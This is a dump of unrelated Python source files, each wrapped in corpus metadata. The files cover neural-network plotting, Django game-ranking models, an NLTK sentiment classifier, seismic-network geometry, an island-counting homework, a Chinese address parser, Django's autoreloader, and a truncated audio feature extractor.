axes.set_ylim([np.amin(self.loss_log[:,2]),1.5*np.mean(self.loss_log[:,2])])\n plt.xlabel(\"step\")\n plt.ylabel(\"cross_entropy\")\n plt.savefig(\"out/cross_entropy_log_\" + self.flag_name + (\"_%d\" % self.number) + \".png\")\n\n # NORMAL PLOTS\n plt.close(\"all\")\n plt.plot(self.loss_log[:,0], self.loss_log[:,1], color=\"red\")\n axes = plt.gca()\n axes.set_ylim([np.amin(self.loss_log[:,1]),1.5*np.mean(self.loss_log[:,1])])\n plt.xlabel(\"step\")\n plt.ylabel(\"l2_loss\")\n plt.savefig(\"out/l2_loss_\" + self.flag_name + (\"_%d\" % self.number) + \".png\")\n\n if False:\n plt.close(\"all\")\n plt.plot(self.loss_log[:,0], self.loss_log[:,2], color=\"blue\")\n axes = plt.gca()\n axes.set_ylim([np.amin(self.loss_log[:,2]),1.5*np.mean(self.loss_log[:,2])])\n plt.xlabel(\"step\")\n plt.ylabel(\"cross_entropy\")\n plt.savefig(\"out/cross_entropy_\" + self.flag_name + (\"_%d\" % self.number) + \".png\")\n \n def save_model(self, export_dir):\n \"\"\"\n Use method to save the complete model, which is graph and variables. 
If you want to load, initialize with the\n export_dir as the import_dir and nothing else.\n Alternatively you can load from a checkpoint set after training, by setting load=True in the initialization.\n The Checkpoint only saves the variables though, so the graph will need to be rebuilt.\n \"\"\"\n builder = tf.saved_model.builder.SavedModelBuilder(export_dir)\n builder.add_meta_graph_and_variables(self.sess, [\"main\"])\n builder.save()\n return export_dir\n","sub_path":"NN.py","file_name":"NN.py","file_ext":"py","file_size_in_byte":27070,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"135322040","text":"#!/usr/bin/env python\n# -*- encoding: utf-8 -*-\n\nfrom abc import ABC, abstractmethod\n\nimport torch.nn as nn\n\nfrom colossalai.builder import build_layer\n\n\nclass BaseModel(nn.Module, ABC):\n\n def __init__(self):\n super(BaseModel, self).__init__()\n self.layers = nn.ModuleList()\n self.layers_cfg = []\n\n def build_from_cfg(self, start=None, end=None):\n assert hasattr(self, 'layers_cfg'), 'Cannot find attribute layers_cfg from the module, please check the ' \\\n 'spelling and if you have initialized this variable'\n if start is None:\n start = 0\n if end is None:\n end = len(self.layers_cfg)\n for cfg in self.layers_cfg[start: end]:\n layer = build_layer(cfg)\n self.layers.append(layer)\n\n @abstractmethod\n def init_weights(self):\n pass\n\n def state_dict_for_save_checkpoint(self, destination=None, prefix='',\n keep_vars=False):\n\n \"\"\"Use this function to override the state dict for\n saving checkpoints.\"\"\"\n return self.state_dict(destination, prefix, keep_vars)\n","sub_path":"colossalai/nn/model/base_model.py","file_name":"base_model.py","file_ext":"py","file_size_in_byte":1170,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"75396304","text":"from datetimewidget.widgets import DateTimeWidget\nfrom django.db import models\nfrom django.db.models import Q\nfrom django.forms import ModelForm\nfrom django.forms.models import inlineformset_factory\nfrom django.utils.translation import ugettext_lazy as _\nfrom index import fields\n\nclass PlayerManager(models.Manager):\n def active_players(self):\n return Player.objects.all().filter(active=True)\n\n# Describes a player. 
This is separate from the authentication\n# system\nclass Player(models.Model):\n # displayed name\n name = models.CharField(max_length=100)\n # color used for the worm in the game\n color = fields.ColorField()\n # real name, optional\n real_name = models.CharField(max_length=100, blank=True)\n # current ranking points\n ranking_points = models.IntegerField(default=1000)\n # current pool points\n pool_points = models.IntegerField(default=0)\n # if the player is not active, it is not visible in the ranking table etc\n active = models.BooleanField(default=True)\n # a written comment for this player\n comment = models.CharField(blank=True, max_length=100000)\n\n objects = PlayerManager()\n\n # calculates the ante according to the given formula for a certain\n # ante percentage and a pool point unlock\n # returns a dictionary consisting of the ante, the new rp (without removing\n # the ante) and the new pp\n def calculate_ante_percentage(self, percentage, pool_points):\n rp = self.ranking_points\n pp = self.pool_points\n if (pp != 0):\n rp = self.ranking_points + min(self.pool_points, pool_points)\n pp = pp - min(pp, pool_points)\n player_ante = round((rp ** 2) * 0.001 * (percentage * 0.01))\n if player_ante == 0 and rp != 0:\n player_ante = 1\n tmp = {}\n tmp[\"ante\"] = int(player_ante)\n tmp[\"rp\"] = rp\n tmp[\"pp\"] = pp\n return tmp\n\n # calculates the ante for a ranked match for this player\n # returns a dictionary consisting of the ante, the new rp (without removing\n # the ante) and the new pp\n def calculate_ranked_ante(self):\n return self.calculate_ante_percentage(2, 40)\n\n # returns all games that the Player p participated in\n def all_games(self):\n return PlayedGame.objects.all().filter(Q(player_left = self) |\n Q(player_right = self))\n\n # returns all games with this player that earned or lost them ranking points,\n # in other words: ranked and tournament games, but not unranked games\n def ranked_and_tournament_games(self):\n return self.all_games().exclude(Q(ranked=False) &\n Q(tournament=None))\n\n def __unicode__(self):\n return u'%s' % (self.name)\n\n def clean(self):\n pass\n\n class Meta:\n ordering = ['name']\n pass\n\n# Describes a tournament. When initially created, it takes the ante from and\n# adds pool points to all players. When it is recorded as finished, \"finished\"\n# is set to True and it hands out the ante to the winners.\nclass Tournament(models.Model):\n # when True, this tournament has ended and points from it have been recorded\n finished = models.BooleanField(default=False)\n # time and date when the tournament started\n start_time = models.DateTimeField()\n # name of the tournament. May be left blank\n name = models.CharField(max_length=100, blank=True)\n # players participating in this tournament\n players = models.ManyToManyField(Player, related_name=\"tournament_players\")\n # ante from each player, in percent\n ante = models.IntegerField()\n # the number of points to take from the point pool for each player\n pool_points = models.IntegerField(default=0)\n # the calculated total ante\n total_ante = models.IntegerField()\n # a written comment for this tournament\n comment = models.CharField(blank=True, max_length=100000)\n\n # distributes points to all players in this tournament. 
It is an error to call this\n # without finished being set to true\n def distribute_points(self):\n # not allowed to distribute points for unfinished tournaments\n if not self.finished:\n raise ValueError\n tpas = self.tournament_placing_antes()\n for tpa in tpas:\n tpa.player.ranking_points = tpa.player.ranking_points + tpa.ante\n tpa.player.save()\n points_changed = PointsChanged.objects.all().filter(tournament=self,\n player=tpa.player)[0]\n points_changed.rp_after = tpa.player.ranking_points\n points_changed.save()\n\n def games(self):\n return PlayedGame.objects.all().filter(tournament=self)\n\n def winner(self):\n try:\n return TournamentPlacingAnte.objects.all().filter(tournament=self).filter(placing=1)[0].player\n except:\n return None\n\n def tournament_placing_antes(self):\n return TournamentPlacingAnte.objects.all().filter(tournament=self)\n\n def __unicode__(self):\n return u'%s_%s_%s_%s_%s_%s' % (self.name, self.finished, self.start_time,\n self.ante, self.pool_points, self.total_ante)\n\n def clean(self):\n pass\n\n class Meta:\n pass\n\n# used for creating a new tournament\nclass TournamentCreateForm(ModelForm):\n class Meta:\n model = Tournament\n fields = (\n 'start_time',\n 'name',\n 'players',\n 'ante',\n 'pool_points',\n )\n labels = {\n 'start_time' : _('Start time'),\n 'name' : _('Name'),\n 'players' : _('Players'),\n 'ante' : _('Ante (in %)'),\n 'pool_points' : _('Pool points unlocked'),\n }\n widgets = {\n 'start_time' : DateTimeWidget(usel10n=True,\n bootstrap_version=3,\n options={'format' : 'yyyy-mm-dd hh:ii',\n 'weekStart' : '1'})\n }\n def __init__(self, *args, **kwargs):\n super(ModelForm, self).__init__(*args, **kwargs)\n self.fields['players'].queryset = Player.objects.active_players()\n\n# used for editing a tournament\nclass TournamentEditForm(ModelForm):\n class Meta:\n model = Tournament\n fields = (\n 'name',\n 'total_ante',\n 'finished',\n )\n labels = {\n 'name' : _('Name'),\n 'total_ante' : _('Total ante'),\n 'finished' : _('Finished'),\n }\n\n# this is the number of points given to each placing in a tournament\nclass TournamentPlacingAnte(models.Model):\n # the tournament this ante belongs to\n tournament = models.ForeignKey(Tournament)\n # the placing it should be given to\n placing = models.IntegerField()\n # the ante this placing receives\n ante = models.IntegerField()\n # the player that got this placing\n player = models.ForeignKey(Player, null=True, blank=True)\n\n def __unicode__(self):\n return u'%s %s %s %s' % (self.tournament, self.placing, self.ante, self.player)\n\n def clean(self):\n pass\n\n class Meta:\n pass\n\nclass TournamentPlacingAnteForm(ModelForm):\n class Meta:\n model = TournamentPlacingAnte\n fields = (\n 'placing',\n 'ante',\n )\n labels = {\n 'placing' : _('Placing'),\n 'ante' : _('Received ante'),\n }\n\nTournamentPlacingAnteFormSet = inlineformset_factory(Tournament, TournamentPlacingAnte,\n extra=1, can_delete=False,\n form=TournamentPlacingAnteForm)\n\nclass TournamentPlacingAnteSubmitForm(ModelForm):\n class Meta:\n model = TournamentPlacingAnte\n fields = (\n 'placing',\n 'ante',\n 'player'\n )\n labels = {\n 'placing' : _('Placing'),\n 'ante' : _('Received ante'),\n 'player' : _('Player'),\n }\n def __init__(self, *args, **kwargs):\n available_players = kwargs.pop('available_players', None)\n super(ModelForm, self).__init__(*args, **kwargs)\n\n if available_players:\n self.fields['player'].queryset = available_players\n\nTournamentPlacingAnteSubmitFormSet = inlineformset_factory(Tournament, TournamentPlacingAnte,\n 
extra=0, can_delete=False,\n form=TournamentPlacingAnteSubmitForm)\n\nclass PlayedGameManager(models.Manager):\n # the last game that was played\n def last_game(self):\n return PlayedGame.objects.all().order_by('start_time').reverse().first()\n\n# records a played game\nclass PlayedGame(models.Model):\n # the tournament this played game belongs to, if any\n tournament = models.ForeignKey(Tournament, null=True)\n # keeps track of whether this is a ranked game or not.\n # when tournament is not None, this should be False\n ranked = models.BooleanField(default=True)\n # the start time of the game\n start_time = models.DateTimeField()\n # the left player\n player_left = models.ForeignKey(Player, related_name=\"playedgame_player_left\")\n # the right player\n player_right = models.ForeignKey(Player, related_name=\"playedgame_player_right\")\n # winner of this game\n winner = models.ForeignKey(Player, related_name=\"winner\", blank=True, null=True)\n # a written comment for this game\n comment = models.CharField(blank=True, max_length=100000)\n\n objects = PlayedGameManager()\n\n # returns all subgames played as a part of this game\n def subgames(self):\n return Subgame.objects.all().filter(parent=self)\n\n def __unicode__(self):\n return u'%s %s vs %s, %s won' % (self.start_time, self.player_left, self.player_right, self.winner)\n\n def clean(self):\n pass\n\n class Meta:\n pass\n\nclass PlayedGameForm(ModelForm):\n class Meta:\n model = PlayedGame\n fields = (\n 'start_time',\n 'player_left',\n 'player_right',\n 'winner',\n 'ranked'\n )\n labels = {\n 'start_time' : _('Start time'),\n 'player_left' : _('Left player'),\n 'player_right' : _('Right player'),\n 'winner' : _('Winner'),\n 'ranked' : _('Ranked'),\n }\n widgets = {\n 'start_time' : DateTimeWidget(usel10n=True,\n bootstrap_version=3,\n options={'format' : 'yyyy-mm-dd hh:ii',\n 'weekStart' : '1'})\n }\n\n def __init__(self, *args, **kwargs):\n available_players = kwargs.pop('available_players', None)\n super(ModelForm, self).__init__(*args, **kwargs)\n\n if available_players:\n self.fields['player_left'].queryset = available_players\n self.fields['player_right'].queryset = available_players\n\n# a subgame to a game that has been played\nclass Subgame(models.Model):\n # the game this belongs to\n parent = models.ForeignKey(PlayedGame)\n # the map that was played.\n map_played = models.CharField(max_length=100, blank=True)\n # the lives left for the left player at the end of the match\n pl_lives = models.IntegerField()\n # the lives left for the right player at the end of the match\n pr_lives = models.IntegerField()\n # the replay file for this game\n replay_file = models.FileField(blank=True, upload_to=\"replays/\")\n\n def __unicode__(self):\n return u'%i - %i' % (self.pl_lives, self.pr_lives)\n\n def clean(self):\n pass\n\n class Meta:\n pass\n\nclass SubgameForm(ModelForm):\n class Meta:\n model = Subgame\n fields = (\n 'map_played',\n 'pl_lives',\n 'pr_lives',\n 'replay_file',\n )\n\n labels = {\n 'map_played' : _('Map played'),\n 'pl_lives' : _('Left player lives left'),\n 'pr_lives' : _('Right player lives left'),\n 'replay_file' : _('Replay file')\n }\n\nSubgameFormSet = inlineformset_factory(PlayedGame, Subgame, max_num=10, extra=1,\n can_delete=False, form=SubgameForm)\n\n# Keeps track of how ranking points etc was changed for a player.\n# Used to keep track of before/after for games and tournaments\nclass PointsChanged(models.Model):\n # the player this belongs to\n player = models.ForeignKey(Player)\n # the tournament this 
belongs to. Both this and game may\n # not both be set (or both be null)\n tournament = models.ForeignKey(Tournament, blank=True, null=True)\n # the game this belongs to. Both this and tournament may\n # not both be set (or both be null)\n game = models.ForeignKey(PlayedGame, blank=True, null=True)\n # ranking points before match\n rp_before = models.IntegerField()\n # ranking points after match\n rp_after = models.IntegerField()\n # pool points before match\n pp_before = models.IntegerField()\n # pool points after match\n pp_after = models.IntegerField()\n\n def __unicode__(self):\n return u'%s_%s_%s_%s_%s_%s_%s' % (self.player, self.tournament,\n self.game, self.rp_before,\n self.rp_after, self.pp_before,\n self.pp_after)\n def clean(self):\n pass\n\n class Meta:\n pass\n","sub_path":"lierogbg/index/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":13723,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"578425037","text":"import nltk\nimport random\nfrom nltk.corpus import movie_reviews\n\ndef main():\n\n\t# documents list will have the list of words and the category of the document (either pos or neg)\n\tdocuments = []\n\n\tfor category in movie_reviews.categories():\n\t\tfor fileid in movie_reviews.fileids(category):\n\t\t\tdocuments.append((list(movie_reviews.words(fileid)), category))\n\n\t# grab all the words in a variable\t\t\n\tall_words = []\n\n\tfor w in movie_reviews.words():\n\t\tall_words.append(w.lower())\n\n\t# frequency dist\n\tall_words = nltk.FreqDist(all_words)\n\n\t# considering the top 3000 words as word features\n\tword_features = list(all_words.keys())[:3000]\n\t# print(len(word_features))\n\n\t# function which will create word features for a given document. We have selected top 3000 words as features according to the freq dist\n\t# for these 3000 features we will get true or false according to their presence in the document\n\tdef find_features(document):\n\t\twords = set(document)\n\t\tfeatures = {}\n\t\tfor w in word_features:\n\t\t\tfeatures[w] = (w in words)\n\t\treturn features\n\n\t# print(len((find_features(movie_reviews.words('neg/cv000_29416.txt')))))\n\t# print((find_features(movie_reviews.words('pos/cv014_13924.txt'))))\n\n\t# for each document it extracts the word features (whether true or false along with the label i.e. 
pos or neg)\n\tfeaturesets = [(find_features(rev), category) for (rev, category) in documents]\n\n\t# print(featuresets[:1][0])\n\t# test = featuresets[:1][0]\n\t# test = test[0]\n\t# print(len(test))\n\t# for e in featuresets[:1][0\n\t# \tprint(e)\n\n\t# test = [cat for (rev, cat) in documents]\n\t# my_dict = {}\n\n\t# for ele in test:\n\t# \tif ele not in my_dict.keys():\n\t# \t\tmy_dict[ele] = 1\n\t# \telif ele in my_dict.keys():\n\t# \t\tmy_dict[ele] += 1\n\n\t# print(my_dict)\n\n\t# print(featuresets[0])\n\n\ttraining_set = featuresets[:1900]\n\n\ttesting_set = featuresets[1900:]\n\n\tclf = nltk.NaiveBayesClassifier.train(training_set)\n\tprint(\"Classifier test percentage: \", (nltk.classify.accuracy(clf, testing_set))*100)\n\n\tclf.show_most_informative_features(15)\n\t\n\nif __name__ == \"__main__\":\n\tmain()\n","sub_path":"classification_words_as_features.py","file_name":"classification_words_as_features.py","file_ext":"py","file_size_in_byte":2049,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"421503652","text":"#!/usr/bin/env python\n\nimport numpy as np\n\nfrom mpl_toolkits.basemap import pyproj\nfrom shapely.geometry import MultiPoint, Point\n\n\n# WGS84 datum (Lat/Lon geographic coordinate system)\nwgs84 = pyproj.Proj(init='EPSG:4326')\n\n# Lambert Azimuthal Equal Area (laea) projection\npj_laea = pyproj.Proj(proj='laea', lat_0=90, lon_0=0, x_0=0, y_0=0,\n ellps='WGS84', datum='WGS84', units='m', no_defs=True)\n\n\nclass SeismicNetwork(object):\n def __init__(self, net_lats, net_lons):\n poly_x, poly_y = pyproj.transform(wgs84, pj_laea, net_lons, net_lats)\n self.polygon = MultiPoint(zip(poly_x, poly_y)).convex_hull\n\n def contains(self, lat, lon):\n x, y = pyproj.transform(wgs84, pj_laea, lon, lat)\n point = Point(x, y)\n if self.polygon.contains(point):\n return True\n else:\n return False\n\n def inside_network(self, epi_lats, epi_lons):\n \"\"\"\n This function returns epicenter coordinates located inside a seismic\n station network. The point-in-polygon problem is solved based on ray\n casting method.\n\n :param epi_lats: Latitudes of earthquake epicenters.\n :param epi_lons: Longitudes of earthquake epicenters.\n\n :type epi_lats: numpy.array, list/tuple or scalar\n :type epi_lons: numpy.array, list/tuple or scalar\n\n :returns:\n Epicenter coordinates located within network. 
The first and second\n columns are latitude and longitude, respectively.\n :rtype: numpy.array\n \"\"\"\n epi_x, epi_y = pyproj.transform(wgs84, pj_laea, epi_lons, epi_lats)\n r = []\n for i, (x, y) in enumerate(zip(epi_x, epi_y)):\n epicenter = Point(x, y)\n if epicenter.within(self.polygon):\n r.append((epi_lats[i], epi_lons[i]))\n return np.array(r)\n","sub_path":"seismic_network.py","file_name":"seismic_network.py","file_ext":"py","file_size_in_byte":1856,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"465928519","text":"# uncompyle6 version 3.7.4\n# Python bytecode 2.7 (62211)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: /tmp/pip-install-n_sfyb/Django/django/utils/autoreload.py\n# Compiled at: 2019-02-14 00:35:17\nimport os, signal, subprocess, sys, time, traceback\nfrom django.apps import apps\nfrom django.conf import settings\nfrom django.core.signals import request_finished\nfrom django.utils import six\nfrom django.utils._os import npath\nfrom django.utils.encoding import get_system_encoding\nfrom django.utils.six.moves import _thread as thread\ntry:\n import threading\nexcept ImportError:\n pass\n\ntry:\n import termios\nexcept ImportError:\n termios = None\n\nUSE_INOTIFY = False\ntry:\n import pyinotify\n fd = pyinotify.INotifyWrapper.create().inotify_init()\n if fd >= 0:\n USE_INOTIFY = True\n os.close(fd)\nexcept ImportError:\n pass\n\nRUN_RELOADER = True\nFILE_MODIFIED = 1\nI18N_MODIFIED = 2\n_mtimes = {}\n_win = sys.platform == 'win32'\n_exception = None\n_error_files = []\n_cached_modules = set()\n_cached_filenames = []\n\ndef gen_filenames(only_new=False):\n \"\"\"\n Returns a list of filenames referenced in sys.modules and translation\n files.\n \"\"\"\n global _cached_filenames\n global _cached_modules\n module_values = set(sys.modules.values())\n _cached_filenames = clean_files(_cached_filenames)\n if _cached_modules == module_values:\n if only_new:\n return []\n else:\n return _cached_filenames + clean_files(_error_files)\n\n new_modules = module_values - _cached_modules\n new_filenames = clean_files([ filename.__file__ for filename in new_modules if hasattr(filename, '__file__')\n ])\n if not _cached_filenames and settings.USE_I18N:\n basedirs = [\n os.path.join(os.path.dirname(os.path.dirname(__file__)), 'conf', 'locale'),\n 'locale']\n for app_config in reversed(list(apps.get_app_configs())):\n basedirs.append(os.path.join(npath(app_config.path), 'locale'))\n\n basedirs.extend(settings.LOCALE_PATHS)\n basedirs = [ os.path.abspath(basedir) for basedir in basedirs if os.path.isdir(basedir)\n ]\n for basedir in basedirs:\n for dirpath, dirnames, locale_filenames in os.walk(basedir):\n for filename in locale_filenames:\n if filename.endswith('.mo'):\n new_filenames.append(os.path.join(dirpath, filename))\n\n _cached_modules = _cached_modules.union(new_modules)\n _cached_filenames += new_filenames\n if only_new:\n return new_filenames + clean_files(_error_files)\n else:\n return _cached_filenames + clean_files(_error_files)\n\n\ndef clean_files(filelist):\n filenames = []\n for filename in filelist:\n if not filename:\n continue\n if filename.endswith('.pyc') or filename.endswith('.pyo'):\n filename = filename[:-1]\n if filename.endswith('$py.class'):\n filename = filename[:-9] + '.py'\n if os.path.exists(filename):\n filenames.append(filename)\n\n return filenames\n\n\ndef reset_translations():\n import gettext\n from django.utils.translation import 
trans_real\n gettext._translations = {}\n trans_real._translations = {}\n trans_real._default = None\n trans_real._active = threading.local()\n return\n\n\ndef inotify_code_changed():\n \"\"\"\n Checks for changed code using inotify. After being called\n it blocks until a change event has been fired.\n \"\"\"\n\n class EventHandler(pyinotify.ProcessEvent):\n modified_code = None\n\n def process_default(self, event):\n if event.path.endswith('.mo'):\n EventHandler.modified_code = I18N_MODIFIED\n else:\n EventHandler.modified_code = FILE_MODIFIED\n\n wm = pyinotify.WatchManager()\n notifier = pyinotify.Notifier(wm, EventHandler())\n\n def update_watch(sender=None, **kwargs):\n if sender and getattr(sender, 'handles_files', False):\n return\n mask = pyinotify.IN_MODIFY | pyinotify.IN_DELETE | pyinotify.IN_ATTRIB | pyinotify.IN_MOVED_FROM | pyinotify.IN_MOVED_TO | pyinotify.IN_CREATE | pyinotify.IN_DELETE_SELF | pyinotify.IN_MOVE_SELF\n for path in gen_filenames(only_new=True):\n wm.add_watch(path, mask)\n\n request_finished.connect(update_watch)\n update_watch()\n notifier.check_events(timeout=None)\n notifier.read_events()\n notifier.process_events()\n notifier.stop()\n return EventHandler.modified_code\n\n\ndef code_changed():\n global _mtimes\n global _win\n for filename in gen_filenames():\n stat = os.stat(filename)\n mtime = stat.st_mtime\n if _win:\n mtime -= stat.st_ctime\n if filename not in _mtimes:\n _mtimes[filename] = mtime\n continue\n if mtime != _mtimes[filename]:\n _mtimes = {}\n try:\n del _error_files[_error_files.index(filename)]\n except ValueError:\n pass\n else:\n if filename.endswith('.mo'):\n return I18N_MODIFIED\n else:\n return FILE_MODIFIED\n\n return False\n\n\ndef check_errors(fn):\n\n def wrapper(*args, **kwargs):\n global _exception\n try:\n fn(*args, **kwargs)\n except Exception:\n _exception = sys.exc_info()\n et, ev, tb = _exception\n if getattr(ev, 'filename', None) is None:\n filename = traceback.extract_tb(tb)[(-1)][0]\n else:\n filename = ev.filename\n if filename not in _error_files:\n _error_files.append(filename)\n raise\n\n return\n\n return wrapper\n\n\ndef raise_last_exception():\n if _exception is not None:\n six.reraise(*_exception)\n return\n\n\ndef ensure_echo_on():\n if termios:\n fd = sys.stdin\n if fd.isatty():\n attr_list = termios.tcgetattr(fd)\n if not attr_list[3] & termios.ECHO:\n attr_list[3] |= termios.ECHO\n if hasattr(signal, 'SIGTTOU'):\n old_handler = signal.signal(signal.SIGTTOU, signal.SIG_IGN)\n else:\n old_handler = None\n termios.tcsetattr(fd, termios.TCSANOW, attr_list)\n if old_handler is not None:\n signal.signal(signal.SIGTTOU, old_handler)\n return\n\n\ndef reloader_thread():\n ensure_echo_on()\n if USE_INOTIFY:\n fn = inotify_code_changed\n else:\n fn = code_changed\n while RUN_RELOADER:\n change = fn()\n if change == FILE_MODIFIED:\n sys.exit(3)\n elif change == I18N_MODIFIED:\n reset_translations()\n time.sleep(1)\n\n\ndef restart_with_reloader():\n while True:\n args = [sys.executable] + [ '-W%s' % o for o in sys.warnoptions ] + sys.argv\n new_environ = os.environ.copy()\n if _win and six.PY2:\n encoding = get_system_encoding()\n for key in new_environ.keys():\n str_key = key.decode(encoding).encode('utf-8')\n str_value = new_environ[key].decode(encoding).encode('utf-8')\n del new_environ[key]\n new_environ[str_key] = str_value\n\n new_environ['RUN_MAIN'] = 'true'\n exit_code = subprocess.call(args, env=new_environ)\n if exit_code != 3:\n return exit_code\n\n\ndef python_reloader(main_func, args, kwargs):\n if 
os.environ.get('RUN_MAIN') == 'true':\n thread.start_new_thread(main_func, args, kwargs)\n try:\n reloader_thread()\n except KeyboardInterrupt:\n pass\n\n else:\n try:\n exit_code = restart_with_reloader()\n if exit_code < 0:\n os.kill(os.getpid(), -exit_code)\n else:\n sys.exit(exit_code)\n except KeyboardInterrupt:\n pass\n\n\ndef jython_reloader(main_func, args, kwargs):\n from _systemrestart import SystemRestart\n thread.start_new_thread(main_func, args)\n while True:\n if code_changed():\n raise SystemRestart\n time.sleep(1)\n\n\ndef main(main_func, args=None, kwargs=None):\n if args is None:\n args = ()\n if kwargs is None:\n kwargs = {}\n if sys.platform.startswith('java'):\n reloader = jython_reloader\n else:\n reloader = python_reloader\n wrapped_main_func = check_errors(main_func)\n reloader(wrapped_main_func, args, kwargs)\n return","sub_path":"pycfiles/djx-0.0.4-py2-none-any/autoreload.py","file_name":"autoreload.py","file_ext":"py","file_size_in_byte":8632,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"530976798","text":"# ----------------------------------------------------------\n# -------- HW 7: Island ---------\n# ----------------------------------------------------------\n\n# ----------------------------------------------------------\n# Please answer these questions after having completed this\n# program\n# ----------------------------------------------------------\n# Name: Brian Veber (This one was submitted on time, see submission 15 at Apr 28 3:14pm)\n# Hours spent on program: 6\n# Collaborators and sources: Tutors (Wen. and Thurs.), Brodie Cohen, Shamarcus Doty\n# (List any collaborators or sources here.)\n# ----------------------------------------------------------\n\n\n# Complete your code for the island program here\n# Define and write and helper functions you want/need!\n\ndef island_searcher(terr, used, row, column):\n '''\n All shell testing done through the island_count function\n ---\n Through if statements and recursion, the function checks for unique\n sets of islands (denoted 'X'). If there is a disconnect in an island,\n then a new island is accounted for. 
It does not count duplicate islands.\n '''\n \n used[row][column] = 0 #Create island located variable\n\n if column + 1 < len(terr[0]): #Checks a new column space\n #print (column)\n if row < len(terr):\n #print (row)\n if used[row][column + 1] == 'X':\n #print (used)\n if terr[row][column+1] == 'X': #Checks for new island mark\n island_searcher(terr, used, row, column + 1) #Recursive function runs if it has found another part of an attached island\n \n if column - 1 >= 0: #Checks a new column space\n if row < len(terr):\n #print (row)\n if used[row][column-1] == 'X':\n if terr[row][column-1] == 'X': #Checks for new island mark\n island_searcher(terr, used, row, column - 1)\n \n if column < len(terr[0]):\n #print (column)\n #print (row)\n if row + 1 < len(terr): #Checks a new row space\n if used[row+1][column] == 'X':\n if terr[row + 1][column] == 'X': #Checks for new island mark\n island_searcher(terr, used, row + 1, column)\n \n if column < len(terr[0]):\n if row-1 > 0: #Checks a new row space\n if used[row-1][column] == 'X':\n if terr[row-1][column] == 'X': #Checks for new island mark\n island_searcher(terr, used, row - 1, column)\n \ndef island_count(terr):\n '''\n Goes through the rows and columns in the given island set and runs the\n island_searcher program to find the total number of unique islands, which\n is returned by 'islandcount.'\n ---\n Testing:\n Enter islands filename to load: islands_7x15.txt\n 8 island(s)\n Enter islands filename to load: islands_6x6.txt\n 5 island(s)\n '''\n used = terr[:] #Set used variable\n islandcount = 0 #Set island count\n \n for row in range(len(used)): #Runs through rows\n for column in range(len(used[row])): #Runs through columns\n if used[row][column] == 'X': #Checks for island markers\n islandcount += 1\n #print (islandcount)\n island_searcher(terr, used, row, column) #Runs through island_searcher to check what part of an island the marker is\n\n return islandcount #Returns island count\n\n#----------------------------------------------------------------------------------\n# If, when you execute \"Run Module\" in IDLE or when you run this script,\n# you want to automatically run the main() function, which\n# prompts for a filename, loads the map, and then calls your island_count\n# function, then change this line to True\n\nrun_main = True\n\n\n#----------------------------------------------------------------------------------\n# Don't change the code below this line\n\ndef load_terr(filename):\n ''' (str) -> list of lists of strings\n Returns a table representing the grid of ~ and X in the given filename '''\n \n try:\n f = open(filename)\n terr = []\n for line in f:\n if len(line.strip()) > 0:\n terr.append(list(line[:-1]))\n f.close()\n return terr\n\n except IOError:\n return None\n\ndef main():\n filename = input('Enter islands filename to load: ')\n terr = load_terr(filename)\n if terr is None:\n print('Error opening', filename)\n return\n else:\n count = island_count(terr)\n print(count, 'island(s)')\n\n\nif __name__ == '__main__' and run_main:\n main()\n\n","sub_path":"hw_07/hw_07_island_final.py","file_name":"hw_07_island_final.py","file_ext":"py","file_size_in_byte":4656,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"604258017","text":"#!/usr/bin/env python \n# -*- coding:utf-8 -*-\n\n# !/usr/bin/env python\n# encoding: utf-8\n# description: 从字符串中提取省市县等名称,用于从纯真库中解析解析地理数据\n\nimport re\n\n# 匹配规则必须含有u,可以没有r\n# 这里第一个分组的问号是懒惰匹配,必须这么做\nPATTERN = 
r'([\\u4e00-\\u9fa5]{2,5}?(?:省|自治区|市))([\\u4e00-\\u9fa5]{2,7}?(?:市|区|县|州))' \\\n r'{0,1}([\\u4e00-\\u9fa5]{2,7}?(?:市|区|县)){0,1}'\ndata_list = ['北京市', '陕西省西安市雁塔区', '西班牙', '北京市海淀区', '黑龙江省佳木斯市汤原县', '内蒙古自治区赤峰市',\n '贵州省黔南州贵定县', '新疆维吾尔自治区伊犁州奎屯市']\n\nfor data in data_list:\n print(data)\n country = data\n province = ''\n city = ''\n district = ''\n pattern = re.compile(PATTERN)\n m = pattern.search(data)\n if not m:\n print(country + '|||')\n continue\n country = '中国'\n if m.lastindex >= 1:\n province = m.group(1)\n if m.lastindex >= 2:\n city = m.group(2)\n if m.lastindex >= 3:\n district = m.group(3)\n out = '%s|%s|%s|%s' % (country, province, city, district)\n print(out)\n","sub_path":"wordcloud/pc_cn.py","file_name":"pc_cn.py","file_ext":"py","file_size_in_byte":1216,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"596734980","text":"import numpy as np\nimport os\nfrom pathlib import Path\nfrom librosa.core import load\nfrom librosa.feature import melspectrogram\nfrom tqdm import tqdm\nimport muda\nfrom muda.deformers import BackgroundNoise\nimport jams\n\nimport meta\n\n\nclass Initializer:\n @classmethod\n def generate_feature_matrix(cls):\n \"\"\"\n Generate the mel spectrogram feature matrix for each audio file and save it.\n\n :return: None\n \"\"\"\n # create the folder if not exists\n def generate_feature_matrix(src_dir, dst_dir):\n \"\"\"\n Generate the feature matrices for all the audio files in the src_dir and save them to dst_dir.\n\n :param src_dir: Path object, the directory where audio files are saved\n :param dst_dir: Path object, the directory where feature matrix are saved\n :return: None\n \"\"\"\n # create the folder if not exists\n os.makedirs(dst_dir, exist_ok=True)\n\n # feature extraction\n for audio_file_path in src_dir.iterdir():\n print('Processing {}.'.format(audio_file_path.name))\n\n # load the audio file\n data, sr = load(str(audio_file_path))\n\n # normalization\n data = data / data.max()\n\n # compute the parameters\n frame_length = int(meta.frame_time_length * sr)\n hop_length = int(meta.hop_time_length * sr)\n\n # compute mel spectrogram\n 